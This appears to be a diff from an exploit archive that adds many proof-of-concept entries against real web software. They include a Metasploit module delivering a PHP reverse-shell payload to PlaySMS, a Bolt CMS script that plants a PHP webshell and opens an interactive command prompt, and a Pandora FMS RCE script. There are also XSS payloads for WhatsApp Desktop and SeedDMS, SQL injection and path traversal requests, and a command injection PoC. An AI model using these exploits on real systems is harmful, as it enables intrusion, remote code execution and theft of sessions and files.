print_status("Second payload download URI is #{get_uri}")
# We need that global variable since get_uri keep using SSL from datastore
# We have to get the URI before restoring the SSL.
@second_stage_url = get_uri
datastore['SSL'] = true if ssl_restore
end
end

42
exploits/multiple/webapps/48295.txt Normal file
View file

@ -0,0 +1,42 @@
# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
# Date: 2020-01-21
# Exploit Author: Gal Weizman
# Vendor Homepage: https://www.whatsapp.com
# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe
# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg
# Version: 0.3.9308
# Tested On: Mac OS, Windows, iPhone
# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426
// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308)
// step 2: open devtools and search in all files "t=e.id"
// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found
// step 4: paste "https://example.com" in the text box and hit "Enter"
// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter"
var payload = `(async function() {
alert(navigator.userAgent);
(async function() {
// read "file:///C:/windows/system32/drivers/etc/hosts" content
const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'));
const t = await r.text();
alert(t);
}())
}())`;
payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`;
e.__x_matchedText = payload;
e.__x_body = `
Innocent text
${payload}
More Innocent text
`;
// step 6: press F8 in order for the execution to continue
// result: a message should be sent to the victim that once is clicked will execute the payload above
// further information: https://github.com/weizman/CVE-2019-18426

40
exploits/multiple/webapps/48376.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
# Author: Besim ALTINOK
# Vendor Homepage: https://www.espocrm.com
# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
# Version: v5.8.5
# Tested on: Xampp
# Credit: İsmail BOZKURT
-------------
Details:
--------------------------------------------
1- When we sent a request to the /api/v1/App/user, we can see user details
---
First Request:
---------------------------
GET /api/v1/App/user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 *************************
Authorization: Basic *************************************
Espo-Authorization: *************************************
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: auth-token-secret=cdc7f7*********************377;
auth-username=user1; auth-token=3a874a********************************48
----
2- When we decode Basic Authorization and Espo-Authorization and change the
value with another username (like admin) in the first request, we can see
other user information and access like BOSS
----------
3- Some Examples and encode technique
- BASE64:
First type: dXNlcjE6MQ== (user1:1)
Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)

153
exploits/php/remote/48335.rb Executable file
View file

@ -0,0 +1,153 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'PlaySMS index.php Unauthenticated Template Injection Code Execution',
'Description' => %q{
This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution
in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom
PHP template system called 'TPL' which is used in the PlaySMS template engine at
`src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a
malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a
second time, results in code execution.
The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.
This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine.
},
'Author' =>
[
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
'Lucas Rosevear' # Found and Initial PoC by NCC Group
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-8644'],
['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'],
['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'ENCODER' => 'php/base64'
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'PlaySMS Before 1.4.3', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-02-05'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'Base playsms directory path', '/']),
]
)
end
def uri
return target_uri.path
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
rescue StandardError
vprint_error('Unable to access the index.php file')
return CheckCode::Unknown
end
if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
# Send Payload in Login Request
def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login'
}
})
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine the CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for login : #{csrf}")
cookies = res.get_cookies
vprint_status('Trying to send the payload in the username field...')
# Encoded in base64 to avoid HTML TAGS which are filter by the Application which is also blocking semicolon(;), that is why we're using delete_suffix(';')
evil = "{{#{payload.encoded.delete_suffix(';')}}}"
# Send Payload with cookies.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
'op' => 'login'
}.to_a.shuffle],
'vars_post' => Hash[{
'X-CSRF-Token' => csrf,
'username' => evil,
'password' => ''
}.to_a.shuffle]
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
# Request Status Check
if res.code == 302
print_good('Payload successfully sent')
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Something went wrong")
end
end
def exploit
cookies = login
vprint_status("Cookies here : #{cookies}")
# Execute Last Sent Username.
send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'cookie' => cookies,
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login'
}
}, 0)
end
end

31
exploits/php/webapps/47898.py
View file

@ -12,32 +12,32 @@
import requests
import sys
if len(sys.argv) !=3D 6:
if len(sys.argv) != 6:
print("[+] Usage : ./exploit.py target username password ip port")
exit()
target =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D int(sys.argv[5])
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = int(sys.argv[5])
request =3D requests.session()
request = requests.session()
login_info =3D {
login_info = {
"nick": username,
"pass": password,
"login_button": "Login"
}
login_request =3D request.post(
target+"/pandora_console/index.php?login=3D1",
login_request = request.post(
target+"/pandora_console/index.php?login=1",
login_info,
verify=3DFalse,
allow_redirects=3DTrue
verify=False,
allow_redirects=True
)
resp =3D login_request.text
resp = login_request.text
if "User not found in database" in resp:
print("[-] Login Failed")
@ -47,7 +47,7 @@ else:
print("[+] Sending crafted graph request ..")
body_request =3D {
body_request = {
"date": "0",
"time": "0",
"period": "0",
@ -65,7 +65,6 @@ body_request =3D {
"draw_button": "Draw"
}
draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
on/netflow/nf_live_view&pure=3D0"
draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0"
print("[+] Check your netcat ;)")
request.post(draw_url, body_request)

30
exploits/php/webapps/48289.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.1.11+200316
# Tested on: Ubuntu 18.04.4
# CVE : CVE-2020-11456
# Vulnerability Details
Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel.
Vulnerable Parameter : "title"
# POC
POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1
Host: TARGET
Content-Length: 374
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D
Connection: close
YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=

167
exploits/php/webapps/48296.py Executable file
View file

@ -0,0 +1,167 @@
# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
# Date: 2020-04-05
# Exploit Author: r3m0t3nu11
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.x
# Tested on: Linux
# CVE : not-yet-0day
# last version
# p0c
#!/usr/bin/python
import requests
import sys
import warnings
import re
import os
from bs4 import BeautifulSoup
from colorama import init
from termcolor import colored
init()
print(colored('''
Pre Auth rce with low credintanl
By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
if len(sys.argv) != 4:
print((len(sys.argv)))
print((colored("[~] Usage : ./bolt.py url username password","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
request = requests.session()
print((colored("[+] Retrieving CSRF token to submit the login
form","green")))
page = request.get(url+"/bolt/login")
html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser')
token = soup.findAll('input')[2].get("value")
login_info = {
"user_login[username]": username,
"user_login[password]": password,
"user_login[login]": "",
"user_login[_token]": token
}
login_request = request.post(url+"/bolt/login", login_info)
print((colored("[+] Login token is : {0}","green")).format(token))
aaa = request.get(url+"/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value")
data_profile = {
"user_profile[password][first]":"password",
"user_profile[password][second]":"password",
"user_profile[email]":"a@a.com",
"user_profile[displayname]":"<?php system($_GET['test']);?>",
"user_profile[save]":"",
"user_profile[_token]":token0
}
profile = request.post(url+'/bolt/profile',data_profile)
cache_csrf = request.get(url+"/bolt/overview/showcases")
soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")
asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
soup2 = BeautifulSoup(asyncc.text, 'html.parser')
tables = soup2.find_all('span', class_ = 'entry disabled')
print((colored("[+] SESSION INJECTION ","green")))
for all_tables in tables:
f= open("session.txt","a+")
f.write(all_tables.text+"\n")
f.close()
num_lines = sum(1 for line in open('session.txt'))
renamePostData = {
"namespace": "root",
"parent": "/app/cache/.sessions",
"oldname": all_tables.text,
"newname": "../../../public/files/test{}.php".format(num_lines),
"token": csrf
}
rename = request.post(url+"/async/folder/rename", renamePostData)
try:
url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
rev = requests.get(url1).text
r1 = re.findall('php',rev)
r2 = r1[0]
if r2 == "php" :
fileINJ = "test{}".format(num_lines)
print((colored("[+] FOUND : "+fileINJ,"green")))
except IndexError:
print((colored("[-] Not found.","red")))
new_name = 0
while new_name != 'quit':
inputs = input(colored("Enter OS command , for exit 'quit' :
","green","on_red"))
if inputs == "quit" :
exit()
else:
a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
aa = a.text
r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
print((r11)[0])
Greetz to : all my friends

18
exploits/php/webapps/48297.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.1.11+200316
# Tested on: Ubuntu 18.04.4
# CVE : CVE-2020-11455
# Vulnerability Details
# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
# that allows an attacker to download arbitrary files. The file manager functionality will also
# delete the file after it is downloaded (if the web service account has permissions to do so),
# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
Vulnerable Parameter : "path"
# POC
https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd

111
exploits/php/webapps/48303.txt Normal file
View file

@ -0,0 +1,111 @@
# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass
# Date: 2020-04-08
# Exploit Author: Spad Security Group
# Vendor Homepage: https://www.djangoproject.com/
# Software Link: https://pypi.org/project/Django/
# Version: 3.0 =<
# Tested on: windows 10
# Language: python3.8
# t.me/SpadSec
# Spad Security Group
from requests import Session
import sys
from bs4 import BeautifulSoup
from time import sleep
from colorama import Fore, Style
from random import choice
from os import name, system
colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]
def cleaner():
if name == "nt":
system("cls")
else:
system("clear")
def logo_printer():
cleaner()
logo = r"""
\_______/
`.,-'\_____/`-.,'
/`..'\ _ /`.,'\
/ /`.,' `.,'\ \
/__/__/ \__\__\__
\ \ \ / / /
\ \,'`._,'`./ /
\,'`./___\,'`./
,'`-./_____\,-'`.
/ \
"""
_logo_enumer = 0
for char in logo:
sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}")
sys.stdout.flush()
_logo_enumer +=1
sleep(0.005)
print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec")
class DjangoCsrfMiddleWareBypass:
def __init__(self, url: str, username: str, password: str):
self.url = url
self.username = username
self.password = password
logo_printer()
self.cookies = {}
self.session = Session()
self.bypass()
def spad_printer(self, string):
print("\n")
for char in string:
sys.stdout.write(char)
sys.stdout.flush()
sleep(0.05)
def bypass(self):
global colors
_conn = self.session.get(self.url)
self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}")
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...")
for key, value in _conn.cookies.items():
self.cookies[key] = value
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!")
soup = BeautifulSoup(_conn.text, "lxml")
csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}")
login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies)
if len(login.history) >= 2:
if login.history[1].is_redirect:
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in")
else:
self.spad_printer("[-] Error")
else:
if login.history:
if login.history[0].is_redirect:
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}")
for key, value in self.session.cookies.items():
self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}")
else:
self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
else:
self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
if __name__ == "__main__":
try:
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
DjangoCsrfMiddleWareBypass(url, username, password)
except IndexError:
logo_printer()
for char in f"[!] python {sys.argv[0]} http://google.com username password":
sys.stdout.write(char)
sys.stdout.flush()
sleep(0.05)

26
exploits/php/webapps/48312.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: Webtateas 2.0 - Arbitrary File Read
# Date: 2020-04-12
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: Webtateas v2.0
# Tested on: Windows
# CVE : N/A
Vulnerable Request:
POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/home.php?
Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver
DNT: 1
action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini

28
exploits/php/webapps/48315.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-04-13
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://davidlingren.com/
# Software Link: https://wordpress.org/plugins/media-library-assistant/
# Version: 2.81
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-11731, CVE-2020-11732
----Local File Inclusion----------------------------
There is a file inclusion vulnerability in the mla-file-downloader.php file. Example:
http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php
Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication.
----Multiple Cross-Site-Scripting-------------------
There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript.
Note that this vulnerability requires authentication.
Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2

34
exploits/php/webapps/48316.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
# Google Dork: inurl:human.aspx intext:moveit
# Date: 2020-04-12
# Exploit Authors: Aviv Beniash, Noam Moshe
# Vendor Homepage: https://www.ipswitch.com/
# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
# CVE : CVE-2019-16383
#
# Related Resources:
# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
# Description:
# The API call for revoking logon tokens is vulnerable to a
# Time based blind SQL injection via the 'token' parameter
# MSSQL payload:
POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
token='; WAITFOR DELAY '0:0:10'--
# MySQL payload:
POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
token=' OR SLEEP(10);

75
exploits/php/webapps/48323.txt Normal file
View file

@ -0,0 +1,75 @@
# Title: Pinger 1.0 - Remote Code Execution
# Date: 2020-04-13
# Author: Milad Karimi
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Date: 2020.04.13
# Author: Milad Karimi
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.
# PoC :
http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php
# Vulnerabile code:
if(isset($_GET['ping'])){
// if this is ever noticably slower, i'll pass it stuff when called
// change the good.xml to config.xml, good is what I use at $WORK
$xml = simplexml_load_file("config.xml");
//$xml = simplexml_load_file("good.xml");
if($_GET['ping'] == ""){
$host = "127.0.0.1";
}else{
$host = $_GET['ping'];
}
$out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout
.' '.$host.' | grep received | awk \'{print $4}\''));
$id = str_replace('.','_',$host);
if(($out == "1") || ($out == "0")){
echo json_encode(array("id"=>"h$id","res"=>"$out"));
}else{
## if it returns nothing, assume network is messed up
echo json_encode(array("id"=>"h$id","res"=>"0"));
}
}
if(isset($_GET['socket'])){
$xml = simplexml_load_file("config.xml");
//$xml = simplexml_load_file("good.xml");
if($_GET['socket'] == ""){
$host = "127.0.0.1 80";
}else{
$host = str_replace(':',' ',$_GET['socket']);
}
$out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
$id = str_replace('.','_',$host);
$id = str_replace(' ','_',$id);
if(preg_match("/succeeded/",$out)){
echo json_encode(array("id"=>"h$id","res"=>"1"));
}else{
## if it returns nothing, assume network is messed up
echo json_encode(array("id"=>"h$id","res"=>"0"));
}
}
?>

352
exploits/php/webapps/48324.txt Normal file
View file

@ -0,0 +1,352 @@
# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.seeddms.org
# Software Link: https://www.seeddms.org/index.php?id=7
# CVE: N/A
Document Title:
===============
SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2209
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2209
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
SeedDMS is a free document management system with an easy to use web
based user interface. It is based on PHP and
MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of
development has made it a mature, powerful
and enterprise ready platform for sharing and storing documents. It's
fully compatible with its predecessor LetoDMS.
(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 &
https://www.seeddms.org/index.php?id=7 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.
Affected Product(s):
====================
Uwe Steinmann
Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14,
v5.1.16, v5.1.18 and v6.0.7
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site web vulnerabilities has been discovered
in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent cross site scripting web vulnerabilities are located in
the `name` and `comment` parameter of the `AddEvent.php` file.
Remote attackers are able to add an own event via op.AddEvent with
malicious script codes. The request method to inject is POST
and the attack vector is located on the application-side. After the
inject the execution occurs in the admin panel within the
`Log Management` - `Webdav` and `Web` on view. The content of the
comment and name is unescaped pushed inside of the logs with
a html/js template. Thus allows an attacker to remotly exploit the issue
by a simple post inject from outside with lower privileges.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected or connected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] op.AddEvent (AddEvent.php)
Vulnerable Parameter(s):
[+] name
[+] comment
Affected Module(s):
[+] Log Management (out.LogManagement.php)
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers
with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser and tamper the http protocol session
2. Open the AddEvent.php and add a new event
3. Insert your script code test payload inside the Name or Comments path
4. Save or submit the entry with error
Note: Now the web and webdav log has captured the insert or erro
5. Now wait until the administrator previews in the log management the
web or webdav view function
6. Successful reproduce of the persistent web vulnerability!
PoC: Vulnerable Source (Log Management - View)
<pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog
?logname=20200413.log
Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe
src="evil.source" onload="alert(document.cookie)"></iframe>
&comment=<iframe src="evil.source"
onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199
</pre>
PoC: Payload
>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe>
--- PoC Session Logs (POST) ---
https://SeedDMS.localhost:8080/out/out.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2973
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
https://SeedDMS.localhost:8080/op/op.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Origin: https://SeedDMS.localhost:8080
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
from=2020-04-13&to=2020-04-13
&name=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&comment=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Note: Injection Point via Calender op.AddEvent Name & Comment
--- PoC Session Logs (GET) ---
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 273
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
https://SeedDMS.localhost:8080/out/evil.source
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: /out/out.ViewFolder.php
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
